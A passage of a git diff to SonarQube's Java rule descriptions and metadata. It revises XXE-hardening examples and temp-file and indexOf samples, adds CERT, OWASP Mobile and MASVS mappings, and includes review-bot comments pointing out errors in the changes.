-// ACCESS_EXTERNAL_SCHEMA not supported in several TransformerFactory implementations
-Transformer transformer = transformerFactory.newTransformer(new StreamSource(xslt));
+For DocumentBuilder, SAXParser, XMLInput, Transformer and Schema JAPX factories:
+
+DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
+// to be compliant, completely disable DOCTYPE declaration:
+factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+// or completely disable external entities declarations:
+factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
+factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+// or prohibit the use of all protocols by external entities:
+factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
+factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
-StringWriter writer = new StringWriter();
-transformer.transform(new StreamSource(xml), new StreamResult(writer));
-String result = writer.toString();
-
-SchemaFactory library:
-
-String xsd = "xxe.xsd";
-StreamSource xsdStreamSource = new StreamSource(xsd);
-SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
-schemaFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // Compliant
-schemaFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
-Schema schema = schemaFactory.newSchema(xsdStreamSource);
-
-Validator library:
-
-String xsd = "xxe.xsd";
-String xml = "xxe.xml";
-StreamSource xsdStreamSource = new StreamSource(xsd);
-StreamSource xmlStreamSource = new StreamSource(xml);
+SAXParserFactory factory = SAXParserFactory.newInstance();
+// to be compliant, completely disable DOCTYPE declaration:
+factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+// or completely disable external entities declarations:
+factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
+factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+// or prohibit the use of all protocols by external entities:
+SAXParser parser = factory.newSAXParser(); // Noncompliant
+parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
+parser.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
-SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
-Schema schema = schemaFactory.newSchema(xsdStreamSource);
-schemaFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
-schemaFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
-// validators will also inherit of these properties
-Validator validator = schema.newValidator();
+XMLInputFactory factory = XMLInputFactory.newInstance();
+// to be compliant, completely disable DOCTYPE declaration:
+factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+// or completely disable external entities declarations:
+factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, Boolean.FALSE);
+// or prohibit the use of all protocols by external entities:
+factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
+factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
-validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
-validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // Compliant
+TransformerFactory factory = javax.xml.transform.TransformerFactory.newInstance();
+// to be compliant, prohibit the use of all protocols by external entities:
+factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
+factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
-StringWriter writer = new StringWriter();
-validator.validate(xmlStreamSource, new StreamResult(writer));
+SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
+// to be compliant, completely disable DOCTYPE declaration:
+factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+// or prohibit the use of all protocols by external entities:
+factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
+factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
-For dom4j library, ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA are not supported, thus a very strict fix
-is to disable doctype declarations:
+For Dom4j library:
SAXReader xmlReader = new SAXReader();
-xmlReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // Compliant
-Document xmlResponse = xmlReader.read(xml);
+xmlReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
-Jdom2 library:
+For Jdom2 library:
-SAXBuilder builder = new SAXBuilder(); // Compliant
-builder.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
-builder.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // Compliant
-Document document = builder.build(new File(xml));
+SAXBuilder builder = new SAXBuilder();
+builder.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
+builder.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
See
+ - Oracle Java Documentation - XML External Entity Injection Attack
- OWASP Top 10 2017 Category A4 - XML External Entities
(XXE)
- OWASP XXE Prevention Cheat
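Review bot: The `// Noncompliant` marker on `SAXParser parser = factory.newSAXParser(); // Noncompliant` sits inside the Compliant Solution block, so the example that is meant to show the fix is labelled as an issue; the new line should read `SAXParser parser = factory.newSAXParser();`. In the same SAXParser snippet the comment `// or prohibit the use of all protocols by external entities:` is placed before the `newSAXParser()` call rather than before the two `parser.setProperty(XMLConstants.ACCESS_EXTERNAL_*, "")` lines it describes, which makes the three alternatives harder to read than in the DocumentBuilder snippet above it. Both occurrences of "JAPX factories" in the new text appear to be a typo for "JAXP factories".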
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2886_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2886_java.json
index 2198574f1e1..8ab5881520d 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2886_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2886_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2886",
"sqKey": "S2886",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "VNA01-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3011_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3011_java.json
index e9e8a631ade..4130cb08ec0 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3011_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3011_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3011",
"sqKey": "S3011",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "SEC05-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3014_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3014_java.json
index 8c2bc3f95ff..137205fd774 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3014_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3014_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-3014",
"sqKey": "S3014",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "THI01-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3034_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3034_java.json
index eb47d427962..74946d0b5c6 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3034_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3034_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3034",
"sqKey": "S3034",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "NUM52-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3064_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3064_java.json
index 55393f9840c..89d9ea5abf2 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3064_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3064_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3064",
"sqKey": "S3064",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "LCK10-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3067_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3067_java.json
index 5f81a4cbedc..a66de939741 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3067_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3067_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3067",
"sqKey": "S3067",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "LCK02-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3077_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3077_java.json
index 98e82c14fd5..0ab4816fe32 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3077_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3077_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-3077",
"sqKey": "S3077",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "CON50-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3078_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3078_java.json
index 0178d33e2a1..b0aee47aa87 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3078_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3078_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3078",
"sqKey": "S3078",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "VNA02-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3329_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3329_java.json
index 8e8b01d8966..3a7ad153370 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3329_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3329_java.json
@@ -8,7 +8,8 @@
},
"tags": [
"cwe",
- "owasp-a6"
+ "owasp-a6",
+ "owasp-m5"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-3329",
@@ -17,10 +18,17 @@
"securityStandards": {
"CWE": [
330,
- 329
+ 329,
+ 340
],
"OWASP": [
"A6"
+ ],
+ "OWASP Mobile": [
+ "M5"
+ ],
+ "MASVS": [
+ "MSTG-CRYPTO-6"
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3346_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3346_java.json
index 21946064353..ccbdf98e25d 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3346_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3346_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3346",
"sqKey": "S3346",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "EXP06-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3366_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3366_java.json
index 59e95723b28..816646dc951 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3366_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3366_java.json
@@ -14,5 +14,11 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3366",
"sqKey": "S3366",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "TSM01-J.",
+ "TSM03-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3457_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3457_java.json
index 0069c96c65e..98e064825fc 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3457_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3457_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3457",
"sqKey": "S3457",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "FIO47-C."
+ ]
+ }
}
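Review bot: The CERT entry added here, `FIO47-C.`, is a CERT C rule attached to a Java rule's metadata, and the same pattern appears in S3518 (`INT33-C.`), S818 (`DCL16-C.`), S864 (`EXP00-C.`, `EXP00-CPP.`), S881 (`EXP30-C.`, `EXP50-CPP.`), S899 (`EXP12-C.`, `ERR33-C.`, `POS54-C.`) and S923, whose only entry is `DCL50-CPP.`. If the security-standards report surfaces these as applicable guidance for Java findings, users will be sent to C/C++ rules, so unless cross-language references are intended the C/C++ identifiers should be filtered out (for S3457 that leaves no `CERT` array to add). These files look generated from the shared rule specification, so the filter presumably belongs in the generator rather than in hand edits here.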
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3518_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3518_java.json
index a2464cea3ba..54bbb3d6d27 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3518_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3518_java.json
@@ -18,6 +18,10 @@
"securityStandards": {
"CWE": [
369
+ ],
+ "CERT": [
+ "NUM02-J.",
+ "INT33-C."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3551_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3551_java.json
index ae8b6ee6be0..a71a4b81f8b 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3551_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S3551_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3551",
"sqKey": "S3551",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "TSM00-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4423_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4423_java.json
index 162685e2d14..48a53bcfe74 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4423_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4423_java.json
@@ -11,7 +11,8 @@
"privacy",
"owasp-a6",
"sans-top25-porous",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m3"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-4423",
@@ -26,6 +27,12 @@
"OWASP": [
"A3",
"A6"
+ ],
+ "OWASP Mobile": [
+ "M3"
+ ],
+ "MASVS": [
+ "MSTG-NETWORK-2"
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4426_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4426_java.html
index ffade10406b..e7503f1a808 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4426_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4426_java.html
@@ -47,6 +47,10 @@
See
- OWASP Top 10 2017 Category A6 - Security
Misconfiguration
+ - Mobile AppSec
+ Verification Standard - Cryptography Requirements
+ - OWASP Mobile Top 10 2016 Category M5 -
+ Insufficient Cryptography
- NIST 800-131A - Recommendation for Transitioning the
Use of Cryptographic Algorithms and Key Lengths
- MITRE, CWE-326 - Inadequate Encryption Strength
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4426_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4426_java.json
index 6c8c7b57fe4..5795bdcb4b9 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4426_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4426_java.json
@@ -24,6 +24,12 @@
"OWASP": [
"A3",
"A6"
+ ],
+ "OWASP Mobile": [
+ "M5"
+ ],
+ "MASVS": [
+ "MSTG-CRYPTO-3"
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4512_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4512_java.json
index 6a9c94f1bbb..4f08d11262c 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4512_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4512_java.json
@@ -21,6 +21,9 @@
],
"OWASP": [
"A1"
+ ],
+ "CERT": [
+ "MSC61-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4635_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4635_java.html
index 3cfb503bebf..10935de7743 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4635_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4635_java.html
@@ -10,13 +10,14 @@
-
startsWith(String prefix)
For each of these methods, another method with an additional parameter is available to specify an offset.
-Using these methods gives the same result while avoiding the creation of additional String
instances.
+Using these methods will avoid the creation of additional String
instances. For indexOf methods, adjust the returned value by
+subtracting the substring index parameter to obtain the same result.
Noncompliant Code Example
str.substring(beginIndex).indexOf(char1); // Noncompliant; a new String is going to be created by "substring"
Compliant Solution
-str.indexOf(char1, beginIndex);
+str.indexOf(char1, beginIndex) - beginIndex; // index for char1 not found is (-1-beginIndex)
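Review bot: The new compliant line changes the not-found sentinel: as its own comment says, a miss now yields `-1 - beginIndex` instead of the `-1` that the noncompliant `substring(...).indexOf(...)` form returns, so any caller that tests `== -1` silently breaks after applying this rule's suggested fix. The example should handle that case explicitly, e.g. `int i = str.indexOf(char1, beginIndex);` followed by `int result = i < 0 ? -1 : i - beginIndex;`, or the prose should state that the adjustment applies only to a non-negative result. If this file is generated from the rule specification, the correction belongs there as well.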
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4790_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4790_java.html
index c0cace1ee99..1c934c62877 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4790_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4790_java.html
@@ -29,6 +29,10 @@ See
OWASP Top 10 2017 Category A6 - Security
Misconfiguration
+ Mobile AppSec
+ Verification Standard - Cryptography Requirements
+ OWASP Mobile Top 10 2016 Category M5 -
+ Insufficient Cryptography
MITRE, CWE-327 - Use of a Broken or Risky Cryptographic Algorithm
MITRE, CWE-916 - Use of Password Hash With Insufficient Computational Effort
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4790_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4790_java.json
index 48d59888503..b02911d4df3 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4790_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4790_java.json
@@ -7,7 +7,8 @@
"spring",
"owasp-a6",
"sans-top25-porous",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m5"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-4790",
@@ -22,6 +23,12 @@
"OWASP": [
"A3",
"A6"
+ ],
+ "OWASP Mobile": [
+ "M5"
+ ],
+ "MASVS": [
+ "MSTG-CRYPTO-4"
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4830_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4830_java.json
index a05b2fa6755..3bc7d193407 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4830_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4830_java.json
@@ -25,6 +25,15 @@
"OWASP": [
"A6",
"A3"
+ ],
+ "OWASP Mobile": [
+ "M3"
+ ],
+ "MASVS": [
+ "MSTG-NETWORK-3"
+ ],
+ "CERT": [
+ "MSC61-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4973_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4973_java.json
index 79c95d94e44..95c2ebd6945 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4973_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S4973_java.json
@@ -18,6 +18,10 @@
"CWE": [
595,
597
+ ],
+ "CERT": [
+ "EXP03-J.",
+ "EXP50-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5042_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5042_java.json
index 5362d997741..5ba769f3628 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5042_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5042_java.json
@@ -23,6 +23,9 @@
"OWASP": [
"A5",
"A6"
+ ],
+ "CERT": [
+ "IDS04-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5320_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5320_java.html
index 7ed65d099f2..ca1d035c5c5 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5320_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5320_java.html
@@ -51,8 +51,10 @@ Sensitive Code Example
See
- - OWASP Top 10 2017 Category A3 - Sensitive Data Exposure
-
+ - Mobile AppSec Verification
+ Standard - Platform Interaction Requirements
+ - OWASP Mobile Top 10 2016 Category M1 - Improper
+ Platform Usage
- MITRE, CWE-927 - Use of Implicit Intent for Sensitive Communication
- Android documentation -
Broadcast Overview - Security considerations and best practices
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5320_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5320_java.json
index 16bf679de76..4312e0396c6 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5320_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5320_java.json
@@ -5,7 +5,7 @@
"tags": [
"cwe",
"android",
- "owasp-a3"
+ "owasp-m1"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-5320",
@@ -15,8 +15,11 @@
"CWE": [
927
],
- "OWASP": [
- "A3"
+ "OWASP Mobile": [
+ "M1"
+ ],
+ "MASVS": [
+ "MSTG-PLATFORM-4"
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5322_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5322_java.html
index f7fdfc1dd1b..2e6375f6006 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5322_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5322_java.html
@@ -47,7 +47,10 @@ Sensitive Code Example
See
- - OWASP Top 10 2017 Category A1 - Injection
+ - Mobile AppSec Verification
+ Standard - Platform Interaction Requirements
+ - OWASP Mobile Top 10 2016 Category M1 - Improper
+ Platform Usage
- MITRE, CWE-925 - Improper Verification of Intent by Broadcast Receiver
- SANS Top 25 - Insecure Interaction Between Components
- Android documentation -
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5322_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5322_java.json
index c29ccafc2cd..282608a1316 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5322_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5322_java.json
@@ -4,7 +4,7 @@
"status": "ready",
"tags": [
"cwe",
- "owasp-a1",
+ "owasp-m1",
"sans-top25-insecure",
"android"
],
@@ -16,8 +16,11 @@
"CWE": [
925
],
- "OWASP": [
- "A1"
+ "OWASP Mobile": [
+ "M1"
+ ],
+ "MASVS": [
+ "MSTG-PLATFORM-2"
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5324_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5324_java.html
index a162deb76b3..15f6d7bbb76 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5324_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5324_java.html
@@ -44,11 +44,11 @@
See
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5324_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5324_java.json
index 58cbe76a559..b879edb0b2f 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5324_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5324_java.json
@@ -4,11 +4,10 @@
"status": "ready",
"tags": [
"cwe",
- "owasp-a1",
"sans-top25-risky",
"android",
"sans-top25-porous",
- "owasp-a3"
+ "owasp-m2"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-5324",
@@ -16,12 +15,13 @@
"scope": "Main",
"securityStandards": {
"CWE": [
- 312,
- 20
+ 312
],
- "OWASP": [
- "A1",
- "A3"
+ "OWASP Mobile": [
+ "M2"
+ ],
+ "MASVS": [
+ "MSTG-STORAGE-1"
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5332_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5332_java.html
index 293ee2827f5..286183246b4 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5332_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5332_java.html
@@ -86,6 +86,10 @@ See
- OWASP Top 10 2017 Category A3 - Sensitive Data Exposure
+ - Mobile AppSec Verification
+ Standard - Network Communication Requirements
+ - OWASP Mobile Top 10 2016 Category M3 - Insecure
+ Communication
- MITRE, CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
- MITRE, CWE-319 - Cleartext Transmission of Sensitive Information
- Google, Moving towards more secure web
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5332_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5332_java.json
index d9e5b2eefb6..52063608be3 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5332_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5332_java.json
@@ -4,7 +4,8 @@
"status": "ready",
"tags": [
"cwe",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m3"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-5332",
@@ -17,6 +18,12 @@
],
"OWASP": [
"A3"
+ ],
+ "OWASP Mobile": [
+ "M3"
+ ],
+ "MASVS": [
+ "MSTG-NETWORK-1"
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5443_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5443_java.html
index 7783a6eba20..f8ff121c60f 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5443_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S5443_java.html
@@ -56,12 +56,20 @@ Sensitive Code Example
Compliant Solution
-new File("/myDirectory/myfile.txt");
+new File("/myDirectory/myfile.txt"); // Compliant
-File.createTempFile("prefix", "suffix", new File("/mySecureDirectory"));
+File.createTempFile("prefix", "suffix", new File("/mySecureDirectory")); // Compliant
-FileAttribute<Set<PosixFilePermission>> attr = PosixFilePermissions.asFileAttribute(PosixFilePermissions.fromString("w+"));
-Files.createTempFile("prefix", "suffix", attr); // Compliant, created with explicit attributes.
+if(SystemUtils.IS_OS_UNIX) {
+ FileAttribute<Set<PosixFilePermission>> attr = PosixFilePermissions.asFileAttribute(PosixFilePermissions.fromString("rwx------"));
+ Files.createTempFile("prefix", "suffix", attr); // Compliant
+}
+else {
+ File f = Files.createTempFile("prefix", "suffix").toFile(); // Compliant
+ f.setReadable(true, true);
+ f.setWritable(true, true);
+ f.setExecutable(true, true);
+}
See
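Review bot: The non-POSIX branch of the new Compliant Solution (`File f = Files.createTempFile("prefix", "suffix").toFile();` followed by the three `set*` calls) creates the file with default permissions first and only then tightens them, and it discards the boolean each `setReadable`/`setWritable`/`setExecutable` returns, so a failure to restrict goes unnoticed; a sample presented as compliant should at least check them, e.g. `if (!f.setReadable(true, true) || !f.setWritable(true, true)) { throw new IOException("cannot restrict temp file permissions"); }`. On Windows the java.io.File permission bits map only loosely onto ACLs, so I am not confident this branch restricts other principals at all — presumably it relies on the per-user temp directory's ACL, which the text could say. Both branches also grant execute: `rwx------` and `f.setExecutable(true, true);` are more than a temporary data file needs, and `PosixFilePermissions.fromString("rw-------")` with the setExecutable line dropped would be the least-privilege example. The first compliant line, 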